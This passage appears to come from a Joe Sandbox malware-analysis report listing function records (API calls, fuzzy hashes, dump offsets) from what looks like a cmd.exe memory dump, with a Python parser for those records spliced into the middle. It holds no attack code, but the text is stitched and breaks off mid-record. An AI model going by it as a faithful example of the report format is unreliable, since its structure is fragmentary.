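• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: ErrorLast$CreateSemaphore
• String ID: _p0$wil
• API String ID: 4049970386-1814513734
• Opcode ID: c6961765234b48acc2cdd869eebfbec076c33597b07b2c175234612668dcbd5d
• Instruction ID: 739261d117b55d8d46d17d5a7241e2870351ac5692626edf8f2a0bb01db7819e
• Opcode Fuzzy Hash: c6961765234b48acc2cdd869eebfbec076c33597b07b2c175234612668dcbd5d
• Instruction Fuzzy Hash: EE31CE71E402198BCB65DF28CD9DABA73A5AB94320F1401A8E806972C0DE71CE05BB70
APIs
• _wcsnicmp.MSVCRT ref: 00F05295
  • Part of subcall function 00EF727B: __iob_func.MSVCRT ref: 00EF7280
• fprintf.MSVCRT ref: 00F05215
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: __iob_func_wcsnicmpfprintf
• String ID: CMD Internal Error %s$%s$Null environment
• API String ID: 1828771275-2781220306
• Opcode ID: 4d3856257f9add4d0fba05ef776422c4fd7d6268cbf0480e04298138a31bf1d0
• Instruction ID: b9aa504305a72207b95e9dafb2fa781e83c918fc85da0079523c7042b914357f
• Opcode Fuzzy Hash: 4d3856257f9add4d0fba05ef776422c4fd7d6268cbf0480e04298138a31bf1d0
• Instruction Fuzzy Hash: 5D313032E00619DBDF38DBA59C45A6FB7A5DF54B10B15042DEC0AB32C1EAB05E01FB55
"""

# "Name.Module(args), ref: ADDR", optionally prefixed by "Part of subcall function X: "
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>[^.(]+)\.(?P<module>[^( ]+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$"
)
STR_RE = re.compile(r"^(?P<s>.*), xrefs: (?P<x>[0-9A-F]+)$")
SRC_RE = re.compile(r"^Source File: (?P<f>[^,]+), Offset: (?P<base>[0-9A-F]+), based on PE: (?P<pe>true|false)$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)      # dicts: name, module, args, ref, subcall_of
    strings: list = field(default_factory=list)   # (string, xref address)
    source_file: str = ""
    image_base: int = 0                           # the record's "Offset" (dump base)
    based_on_pe: bool = False
    similarity: dict = field(default_factory=dict)

    def api_string_id(self):
        """The 'API String ID' as its two numeric halves."""
        a, b = self.similarity["API String ID"].split("-")
        return int(a), int(b)

    def api_rvas(self):
        """Rebase every API ref address to an RVA within the dumped module."""
        return [a["ref"] - self.image_base for a in self.apis]


def parse_records(text):
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":            # each function block opens with its API list
                rec = FunctionRecord()
                records.append(rec)
            section = line
            continue
        if rec is None or not line.startswith("•"):
            continue                      # blank lines, "Associated:" noise, etc.
        body = line[1:].strip()
        if section == "APIs" and (m := API_RE.match(body)):
            rec.apis.append({"name": m["name"], "module": m["module"],
                             "args": m["args"].split(",") if m["args"] is not None else [],
                             "ref": int(m["ref"], 16), "subcall_of": m["sub"]})
        elif section == "Strings" and (m := STR_RE.match(body)):
            rec.strings.append((m["s"], int(m["x"], 16)))
        elif section == "Memory Dump Source" and (m := SRC_RE.match(body)):
            rec.source_file, rec.image_base = m["f"], int(m["base"], 16)
            rec.based_on_pe = m["pe"] == "true"
        elif section == "Similarity":
            key, _, value = body.partition(": ")
            rec.similarity[key] = value
    return records


def index_by_api(records):
    """Map API name -> list of API String IDs of the functions that call it."""
    index = {}
    for rec in records:
        sid = rec.similarity.get("API String ID")
        for api in rec.apis:
            bucket = index.setdefault(api["name"], [])
            if sid not in bucket:
                bucket.append(sid)
    return index


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.similarity["API ID"], [hex(r) for r in rec.api_rvas()])
```

The RVAs (ref minus Offset) are what you would feed to a disassembler opened on the dumped module or, when the dump base matches the on-disk image's load address, to the on-disk PE itself; the API String ID and Instruction Fuzzy Hash are the stable keys for comparing the same function between reports of different samples.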

APIs
• memset.MSVCRT ref: 00F0A034
  • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
• GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,-00000209,00000000,?,-00000209,00000400,L#,00000400), ref: 00F0A078
• GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00F0A0AA
• ??_V@YAXPAX@Z.MSVCRT(00000000,-00000209,00000400,L#,00000400), ref: 00F0A0C2
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: memset$DriveFullNamePathType
                                                                                                                                                                                                                                                                                                                                                      • String ID: L#
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3442494845-2643830878
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 67c0fcfd26a342de5a55a720ec980d0fa36d1f9a7d0d00494ffef79d04fd855f
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 6ccad7b6cceb5097ad020daa53979c8344a362057024d2ed399fe1dcf42e8dd2
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 67c0fcfd26a342de5a55a720ec980d0fa36d1f9a7d0d00494ffef79d04fd855f
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91213771E0021E9BDB24DFA9DD859BFBBF8EF44354F040069A505E3141E634DE44DA52
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEAB7F: iswspace.MSVCRT ref: 00EEAB8D
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEAB7F: wcschr.MSVCRT ref: 00EEAB9E
                                                                                                                                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 00EEB3FC
                                                                                                                                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 00EEB40E
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: wcschr$iswspace
                                                                                                                                                                                                                                                                                                                                                      • String ID: &<|>$+: $=,;
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3458554142-2256444845
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 08a3c7b32616ec3574e1963bad35af41ca36c9d8ce6d2b6a3efe7e0a0bc9e36b
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: c48f39b0b0b2a660e655bafb7dfb06075dfd3ab2c0b4e40da8d55c18fd0ad106
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08a3c7b32616ec3574e1963bad35af41ca36c9d8ce6d2b6a3efe7e0a0bc9e36b
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B112731A0019DA6C7349B2784415BFB7EAEFA5758B28102AE4C0B7390F7725C01E211
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EEFD3A
                                                                                                                                                                                                                                                                                                                                                      • wcsspn.MSVCRT ref: 00EEFF18
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,)",00000000,-00000105,?,00000000,00000000), ref: 00EF000F
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF1CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,00EE80F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00EF1D3A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF1CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00EE80F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00EF1D44
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF1CD5: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,00EE80F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00EF1D57
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF1CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00EE80F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00EF1D61
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: ErrorMode$FullNamePathmemsetwcsspn
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1535828850-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 6f01357136c7dfc5247c0c477185a298948a20394694035b83987f29bc9d69f7
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 97b2df9b47439265ae80ffa7ef4b1e5f457f273a76903de13f9161bb6e898494
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f01357136c7dfc5247c0c477185a298948a20394694035b83987f29bc9d69f7
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6BC18475A00259CFDB24DF19C850BA9B7B6FF44314F5591AED509A73A1EB30AD81CF40
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: memset$_setjmp3
• String ID:
• API String ID: 4215035025-0
• Opcode ID: 391194a03a71e6e3ec7e61ae0c2845fddf2f0d686e93dc70f8d18c8f739a0962
• Instruction ID: 059a0c8e2930c808d9a7e1d3abf3774dec92805b286e6a09bab208c59c97d0d6
• Opcode Fuzzy Hash: 391194a03a71e6e3ec7e61ae0c2845fddf2f0d686e93dc70f8d18c8f739a0962
• Instruction Fuzzy Hash: C5518572E0166D9BCB24CB56DC94AEEBBB4FB44348F145099E609F3151DB309E84CF61
APIs
• memset.MSVCRT ref: 00F09631
• memset.MSVCRT ref: 00F0964F
  • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
• _wcsicmp.MSVCRT ref: 00F096FD
• ??_V@YAXPAX@Z.MSVCRT(00000000,-00000209,?,?,?,?,00000000,?), ref: 00F0971B
• ??_V@YAXPAX@Z.MSVCRT(00000000,-00000209,?,?,?,?,00000000,?), ref: 00F09733
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: memset$_wcsicmp
• String ID:
• API String ID: 1670951261-0
• Opcode ID: 0111e795a6d57f00898edc23ff534c3ddd95e349ec12961d8e865fd5be8c6b14
• Instruction ID: cd4d2e25c591dcf6653f32996318b89554bb411bc4a85440e71d53e63c8873f3
• Opcode Fuzzy Hash: 0111e795a6d57f00898edc23ff534c3ddd95e349ec12961d8e865fd5be8c6b14
• Instruction Fuzzy Hash: B941A472E1421D9BDB24DBA5DCD5BAEB7B8EF44354F0000A9E905E3182EB74DE80DB61
APIs
• _get_osfhandle.MSVCRT ref: 00F09527
• ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00F0952F
• _get_osfhandle.MSVCRT ref: 00F095B5
• SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00F095BD
  • Part of subcall function 00F08C50: longjmp.MSVCRT(00F20A70,00000001,l ,00EE5E68,?,?,?,?,00000000), ref: 00F08CC4
  • Part of subcall function 00F08C50: memset.MSVCRT ref: 00F08D1D
  • Part of subcall function 00F08C50: memset.MSVCRT ref: 00F08D45
  • Part of subcall function 00F08C50: memset.MSVCRT ref: 00F08D6D
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00F095CC
  • Part of subcall function 00EEA16C: _close.MSVCRT ref: 00EEA19B
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: memset$File_get_osfhandle$ErrorLastPointerRead_closelongjmp
• String ID:
• API String ID: 288106245-0
• Opcode ID: f925dbec8525c523a10c1cbf8c553832542037650db2b5cfa0e3e845498bec37
• Instruction ID: a5b7a0de3cc0e1f82a4af9e9226b20c23ca46671a60781324a6f7d92519195d8
• Opcode Fuzzy Hash: f925dbec8525c523a10c1cbf8c553832542037650db2b5cfa0e3e845498bec37
• Instruction Fuzzy Hash: 35319272E04108AFEF29EB75DC49BBE77A9EB44320F148129E502D71C2EAB4DD41BB50
APIs
• _get_osfhandle.MSVCRT ref: 00EF4CC2
• ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00F08FB3,?,00000000,?,?,?,?,?,?,?,00000000,?,00000021,00000000,?), ref: 00EF4CCA
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00F00BFC
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00F00C48
• DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00F00C71
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: ErrorFileLast$DeleteRead_get_osfhandle
• String ID:
• API String ID: 3588551418-0
• Opcode ID: 5e5832c598d5e5543c426b36278419d723e840bbb832b0f6914c70ea8d585022
• Instruction ID: 0785a5db64350f44b98e8b9e8b875232ac64fc7c664c8da6fe5ea2e2f0af9f85
• Opcode Fuzzy Hash: 5e5832c598d5e5543c426b36278419d723e840bbb832b0f6914c70ea8d585022
• Instruction Fuzzy Hash: 7C31BFB1A0010DAFEB28DF25D845ABF77A9EF84314B259429E902E32D1DF359C41EB21
APIs
• _get_osfhandle.MSVCRT ref: 00EEE29B
• SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00EEE2A3
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: FilePointer_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1013686580-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 4fc38c51519e2b81fb888093c17a80f2d8df32ad7ca68dd66f2910cfc0f2d7a0
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 628d4f36068f595fa4f39161f0202485bbdfa456d0154a858a9b3fbde6f175d9
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4fc38c51519e2b81fb888093c17a80f2d8df32ad7ca68dd66f2910cfc0f2d7a0
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 79110631208108EFD3346FA4EC4EFA57B96EB08761F356015F305BA1E1EB619C41EA54
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDD98: _get_osfhandle.MSVCRT ref: 00EEDDA3
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00EFC050), ref: 00EEDDAD
                                                                                                                                                                                                                                                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 00F08571
                                                                                                                                                                                                                                                                                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 00F0857E
                                                                                                                                                                                                                                                                                                                                                      • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,00000000,?,?), ref: 00F085C7
                                                                                                                                                                                                                                                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,00000000), ref: 00F085D5
                                                                                                                                                                                                                                                                                                                                                      • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00F085DC
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3008996577-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 7a226e482bf4d69cd3c7cb23d0bf6c6ac1b97290592a48027fc6ee11e10d2049
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 91ce51f3e93917e2ceb521b5e61f730496c690679befce7458043d979ce556b2
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7a226e482bf4d69cd3c7cb23d0bf6c6ac1b97290592a48027fc6ee11e10d2049
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF113A3590024D9BCB14DFF49C05AEEB7B9AF0C720F10551AE515F7190EA348906DB6A
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 00EF7122
                                                                                                                                                                                                                                                                                                                                                      • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00EF7131
                                                                                                                                                                                                                                                                                                                                                      • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00EF713A
                                                                                                                                                                                                                                                                                                                                                      • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00EF7143
                                                                                                                                                                                                                                                                                                                                                      • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 00EF7158
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1445889803-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 62dabe2a0076c41e4cfaefffb39558633863ca7b00f5d11299b76ce4802e7a71
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 5a7fbd96af086de0923c1309ad8fc4e6cfad7d43a2c7bb2121baf2cde5799384
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 62dabe2a0076c41e4cfaefffb39558633863ca7b00f5d11299b76ce4802e7a71
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E5112A71D0620CEBCB10DFB8DA4869EB7F5FF48315F614865D502E72A0E7709B059B42
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,00EF87E5,00000000,?,00EE4A0A), ref: 00F0484A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDD98: _get_osfhandle.MSVCRT ref: 00EEDDA3
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00EFC050), ref: 00EEDDAD
                                                                                                                                                                                                                                                                                                                                                      • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,00EF87E5,00000000,?,00EE4A0A), ref: 00F04879
                                                                                                                                                                                                                                                                                                                                                      • _getch.MSVCRT ref: 00F0487F
                                                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00EF87E5,00000000,?,00EE4A0A), ref: 00F04897
                                                                                                                                                                                                                                                                                                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00EF87E5,00000000,?,00EE4A0A), ref: 00F048AD
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: CriticalSection$BufferConsoleEnterFileFlushHandleInputLeaveType_get_osfhandle_getch
• String ID:
• API String ID: 491502236-0
• Opcode ID: 3f9a42cba9a6037466fb54137feaa9ecd59bd286b6aeb859f3ca41cbfd185711
• Instruction ID: 1bbd0c06d1db4ca670f537383bc44601d869d4da44bae13a696789a3d7610c33
• Opcode Fuzzy Hash: 3f9a42cba9a6037466fb54137feaa9ecd59bd286b6aeb859f3ca41cbfd185711
• Instruction Fuzzy Hash: 5401D4B1504258FFEB24ABA19C0AB9E3BE5DF00730F108518F901961E1EB75AD50FB91
APIs
